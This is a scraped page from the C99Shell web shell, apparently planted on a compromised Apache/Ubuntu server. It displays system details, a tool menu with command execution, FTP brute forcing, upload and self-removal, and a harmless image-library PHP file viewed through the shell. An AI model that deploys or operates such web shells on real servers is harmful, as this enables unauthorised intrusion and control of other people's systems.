!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/intervention/image/src/Intervention/Image/   drwxr-xr-x
Free 13.27 GB of 57.97 GB (22.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AbstractShape.php (1.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Intervention\Image;

abstract class 
AbstractShape
{
    
/**
     * Background color of shape
     *
     * @var string
     */
    
public $background;

    
/**
     * Border color of current shape
     *
     * @var string
     */
    
public $border_color;

    
/**
     * Border width of shape
     *
     * @var int
     */
    
public $border_width 0;

    
/**
     * Draws shape to given image on given position
     *
     * @param  Image   $image
     * @param  int     $posx
     * @param  int     $posy
     * @return boolean
     */
    
abstract public function applyToImage(Image $image$posx 0$posy 0);

    
/**
     * Set text to be written
     *
     * @param  string $text
     * @return void
     */
    
public function background($color)
    {
        
$this->background $color;
    }

    
/**
     * Set border width and color of current shape
     *
     * @param  int     $width
     * @param  string  $color
     * @return void
     */
    
public function border($width$color null)
    {
        
$this->border_width is_numeric($width) ? intval($width) : 0;
        
$this->border_color is_null($color) ? '#000000' $color;
    }

    
/**
     * Determines if current shape has border
     *
     * @return boolean
     */
    
public function hasBorder()
    {
        return (
$this->border_width >= 1);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--